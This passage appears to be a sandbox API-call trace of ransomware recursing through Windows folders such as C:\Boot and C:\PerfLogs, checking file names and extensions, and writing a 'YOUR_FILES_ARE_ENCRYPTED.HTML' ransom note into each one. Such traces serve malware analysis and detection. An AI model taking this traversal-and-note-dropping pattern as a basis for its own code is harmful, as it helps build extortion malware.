ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0155.206] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned 33 [0155.206] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.206] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.206] lstrlenW (lpString=".mui") returned 4 [0155.206] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0155.206] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x60, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0155.206] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.206] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 47 [0155.206] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\zh-TW\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\zh-tw\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.206] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.209] CloseHandle (hObject=0x4a4) returned 1 [0155.209] GetProcessHeap () returned 0x270000 [0155.210] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.210] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0155.210] FindClose (in: hFindFile=0x42f30c0 | out: hFindFile=0x42f30c0) returned 1 [0155.210] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Boot\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 41 [0155.210] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\boot\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x580 [0155.211] WriteFile (in: hFile=0x580, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe744, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe744*=0x3c00, lpOverlapped=0x0) returned 1 [0155.213] CloseHandle (hObject=0x580) returned 1 [0155.213] GetProcessHeap () returned 0x270000 [0155.214] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0155.214] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0xeadddff4, ftLastWriteTime.dwHighDateTime=0x1cf9266, nFileSizeHigh=0x0, nFileSizeLow=0x5f9d8, dwReserved0=0x14, dwReserved1=0x4ebe844, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0155.214] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\bootmgr") returned 14 [0155.214] lstrcmpW (lpString1="bootmgr", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.214] PathFindExtensionW (pszPath="bootmgr") returned="" [0155.214] lstrlenW (lpString="") returned 0 [0155.214] PathFindExtensionW (pszPath="bootmgr") returned="" [0155.214] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xec769800, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xec769800, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0xec769800, ftLastWriteTime.dwHighDateTime=0x1d70562, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x14, dwReserved1=0x4ebe844, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0155.214] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\BOOTSECT.BAK") returned 19 [0155.214] lstrcmpW (lpString1="BOOTSECT.BAK", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.214] PathFindExtensionW (pszPath="BOOTSECT.BAK") returned=".BAK" [0155.214] lstrlenW (lpString=".BAK") returned 4 [0155.214] PathFindExtensionW (pszPath="BOOTSECT.BAK") returned=".BAK" [0155.214] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5cdd6f43, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x5cdd6f43, ftLastAccessTime.dwHighDateTime=0x1ca0427, ftLastWriteTime.dwLowDateTime=0x54e43b7c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x14, dwReserved1=0x4ebe844, cFileName="config.sys", cAlternateFileName="")) returned 1 [0155.215] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\config.sys") returned 17 [0155.215] lstrcmpW (lpString1="config.sys", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.215] PathFindExtensionW (pszPath="config.sys") returned=".sys" [0155.215] lstrlenW (lpString=".sys") returned 4 [0155.215] PathFindExtensionW (pszPath="config.sys") returned=".sys" [0155.215] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1765f29d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1765f29d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1765f29d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0155.215] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Documents and Settings") returned 29 [0155.215] GetProcessHeap () returned 0x270000 [0155.215] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0155.215] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Documents and Settings" | out: lpString1="\\\\?\\C:\\Documents and Settings") returned="\\\\?\\C:\\Documents and Settings" [0155.215] lstrcatW (in: lpString1="\\\\?\\C:\\Documents and Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Documents and Settings\\*") returned="\\\\?\\C:\\Documents and Settings\\*" [0155.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec508200, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0x450498a0, ftLastAccessTime.dwHighDateTime=0x1d706a3, ftLastWriteTime.dwLowDateTime=0x450498a0, ftLastWriteTime.dwHighDateTime=0x1d706a3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="\ミ∄)) returned 0xffffffff [0155.215] GetProcessHeap () returned 0x270000 [0155.216] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0155.216] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xfa1efe20, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xfa1efe20, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x7bd32120, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0155.216] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\hiberfil.sys") returned 19 [0155.216] lstrcmpW (lpString1="hiberfil.sys", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.216] PathFindExtensionW (pszPath="hiberfil.sys") returned=".sys" [0155.217] lstrlenW (lpString=".sys") returned 4 [0155.217] PathFindExtensionW (pszPath="hiberfil.sys") returned=".sys" [0155.217] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xfa1a3b60, ftCreationTime.dwHighDateTime=0x1d70562, ftLastAccessTime.dwLowDateTime=0xfa1a3b60, ftLastAccessTime.dwHighDateTime=0x1d70562, ftLastWriteTime.dwLowDateTime=0x7c21ae80, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0155.217] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\pagefile.sys") returned 19 [0155.217] lstrcmpW (lpString1="pagefile.sys", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0155.217] PathFindExtensionW (pszPath="pagefile.sys") returned=".sys" [0155.217] lstrlenW (lpString=".sys") returned 4 [0155.217] PathFindExtensionW (pszPath="pagefile.sys") returned=".sys" [0155.217] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9a933d4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0155.217] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\PerfLogs") returned 15 [0155.217] GetProcessHeap () returned 0x270000 [0155.217] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0155.217] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\PerfLogs" | out: lpString1="\\\\?\\C:\\PerfLogs") returned="\\\\?\\C:\\PerfLogs" [0155.217] lstrcatW (in: lpString1="\\\\?\\C:\\PerfLogs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\PerfLogs\\*") returned="\\\\?\\C:\\PerfLogs\\*" [0155.217] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9a933d4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f30c0 [0155.218] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9a933d4, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.218] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x70e97b57, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0155.218] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin") returned 21 [0155.218] GetProcessHeap () returned 0x270000 [0155.218] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.218] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\PerfLogs\\Admin" | out: lpString1="\\\\?\\C:\\PerfLogs\\Admin") returned="\\\\?\\C:\\PerfLogs\\Admin" [0155.218] lstrcatW (in: lpString1="\\\\?\\C:\\PerfLogs\\Admin", lpString2="\\*" | out: lpString1="\\\\?\\C:\\PerfLogs\\Admin\\*") returned="\\\\?\\C:\\PerfLogs\\Admin\\*" [0155.218] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x70e97b57, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0155.218] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x70e97b57, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0155.218] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x70e97b57, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0155.218] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0155.220] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\PerfLogs\\Admin\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 51 [0155.220] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\perflogs\\admin\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0155.221] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0155.223] CloseHandle (hObject=0x4a4) returned 1 [0155.223] GetProcessHeap () returned 0x270000 [0155.224] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.224] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9a933d4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9a933d4, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x70e97b57, ftLastWriteTime.dwHighDateTime=0x1ca0427, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 0 [0155.224] FindClose (in: hFindFile=0x42f30c0 | out: hFindFile=0x42f30c0) returned 1 [0155.224] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\PerfLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 45 [0155.224] CreateFileW (lpFileName="\\\\?\\C:\\PerfLogs\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\perflogs\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x580 [0155.224] WriteFile (in: hFile=0x580, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe744, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe744*=0x3c00, lpOverlapped=0x0) returned 1 [0155.226] CloseHandle (hObject=0x580) returned 1 [0155.227] GetProcessHeap () returned 0x270000 [0155.227] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0155.228] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf9ab9533, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xb35baea0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xb35baea0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0155.228] FindNextFileW (in: hFindFile=0x42f2fc0, lpFindFileData=0x4ebe784 | out: lpFindFileData=0x4ebe784*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x4ebe844, cFileName="ProgramData", cAlternateFileName="PROGRA~2")) returned 1 [0155.228] wnsprintfW (in: pszDest=0x430df38, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData") returned 18 [0155.228] GetProcessHeap () returned 0x270000 [0155.228] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0155.228] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\ProgramData" | out: lpString1="\\\\?\\C:\\ProgramData") returned="\\\\?\\C:\\ProgramData" [0155.228] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\*") returned="\\\\?\\C:\\ProgramData\\*" [0155.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\*", lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f30c0 [0155.228] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xa376ca70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa376ca70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.228] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0155.228] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Application Data") returned 35 [0155.228] GetProcessHeap () returned 0x270000 [0155.228] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.228] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Application Data" | out: lpString1="\\\\?\\C:\\ProgramData\\Application Data") returned="\\\\?\\C:\\ProgramData\\Application Data" [0155.228] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Application Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Application Data\\*") returned="\\\\?\\C:\\ProgramData\\Application Data\\*" [0155.228] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Application Data\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x73e0048, ftCreationTime.dwLowDateTime=0x42fdf30, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebe1cc, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="Hܾ")) returned 0xffffffff [0155.235] GetProcessHeap () returned 0x270000 [0155.236] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.236] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176ab55d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176ab55d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176ab55d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0155.236] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Desktop") returned 26 [0155.236] GetProcessHeap () returned 0x270000 [0155.236] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x431df40 [0155.236] lstrcpyW (in: lpString1=0x431df40, lpString2="\\\\?\\C:\\ProgramData\\Desktop" | out: lpString1="\\\\?\\C:\\ProgramData\\Desktop") returned="\\\\?\\C:\\ProgramData\\Desktop" [0155.236] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Desktop\\*") returned="\\\\?\\C:\\ProgramData\\Desktop\\*" [0155.236] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Desktop\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x73e0048, ftCreationTime.dwLowDateTime=0x42fdf30, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebe1cc, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="Hܾ")) returned 0xffffffff [0155.236] GetProcessHeap () returned 0x270000 [0155.237] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x431df40 | out: hHeap=0x270000) returned 1 [0155.237] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176ab55d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176ab55d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176ab55d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, 